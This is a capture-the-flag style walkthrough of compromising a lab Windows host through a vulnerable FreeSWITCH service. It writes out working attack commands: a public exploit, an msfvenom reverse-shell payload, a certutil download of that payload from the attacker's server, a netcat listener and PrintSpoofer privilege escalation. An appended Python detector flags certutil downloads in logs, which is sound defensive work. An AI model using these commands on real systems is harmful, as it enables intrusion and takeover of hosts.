How low are your morals?
Command :
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
There is a service running on port 8021. It’s FreeSWITCH.
Vulnerability research – FreeSWITCH :
searchsploit freeswitch
The 47799.txt file contains an exploit written in Python. You have to rename it with a .py extension.
Command :
mv 47799.txt 47799.py
Does the exploit work? Is the service vulnerable? We don’t get a lot of information about the service itself. The only way to find out is to test…
Command :
python3.9 47799.py 10.10.135.236 whoami
Result :
The exploit works. We were able to get the name of the user running the service.
The next step is to use the exploit to get a reverse shell.
Command :
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
Setting up a Kali web server :
python3.9 -m http.server 8787
Command :
python3.9 47799.py 10.10.135.236 'certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe'
Setting up a netcat listener :
nc -nlvp 4444
Command :
python3.9 47799.py 10.10.135.236 'sr.exe'
Receiving the reverse shell :
Command :
whoami /priv
The user has the SeImpersonatePrivilege privilege.
To escalate privileges via SeImpersonatePrivilege, it is possible to use the PrintSpoofer.exe exploit, available at this address.
Download :
certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe
Command :
PrintSpoofer.exe -i -c cmd
Please note that the command may not work the first time. Do not hesitate to run it again several times.
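On the defensive side, the certutil -urlcache -split -f downloads used in this walkthrough leave a recognisable command line in process-creation logs. The following Python is an added example, not part of the original write-up: it flags such command lines in constructed sample events and raises the severity when the parent is a network-facing service. The event field names (host, parent, cmdline) and the FreeSwitchConsole.exe parent image name are assumptions.

```python
import re

# certutil accepts "-" and "/" option prefixes; Windows command lines are case-insensitive.
URLCACHE = re.compile(r'(?:^|[\\/\s"])certutil(?:\.exe)?"?\s.*[-/]urlcache\b', re.I)
URL = re.compile(r"\bhttps?://[^\s\"']+", re.I)

def certutil_download(cmdline):
    """Return the fetched URL if cmdline is a certutil URL-cache download, else None."""
    if not URLCACHE.search(cmdline):
        return None
    m = URL.search(cmdline)
    return m.group(0) if m else None

def triage(events, service_parents=("freeswitchconsole.exe",)):
    """Return (severity, host, url) for each certutil download found in events.

    service_parents is an assumption: image names of network-facing services
    that should never spawn a downloader. Adjust it to the local inventory.
    """
    findings = []
    for ev in events:
        url = certutil_download(ev["cmdline"])
        if url is None:
            continue
        parent = ev.get("parent", "").lower().rsplit("\\", 1)[-1]
        severity = "high" if parent in service_parents else "medium"
        findings.append((severity, ev["host"], url))
    return findings

# Constructed sample events (not captured from a real host).
SAMPLE = [
    {"host": "WIN-A", "parent": r"C:\svc\FreeSwitchConsole.exe",
     "cmdline": "cmd /c certutil -urlcache -split -f http://192.0.2.10:8787/a.exe"},
    {"host": "WIN-B", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\CertUtil.exe" /URLCache /f https://example.test/x.bin o.bin'},
    # Legitimate certificate check: no -urlcache option, must not alert.
    {"host": "WIN-C", "parent": r"C:\Windows\System32\mmc.exe",
     "cmdline": "certutil -verify server.cer"},
    # Cache cleanup: -urlcache without a URL, must not alert.
    {"host": "WIN-D", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache * delete"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```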
That’s all folks
Thank you for taking the trouble to come to the site to read this write-up.
I hope you enjoyed it and that it taught you new things.
Feel free to leave a comment or share this article.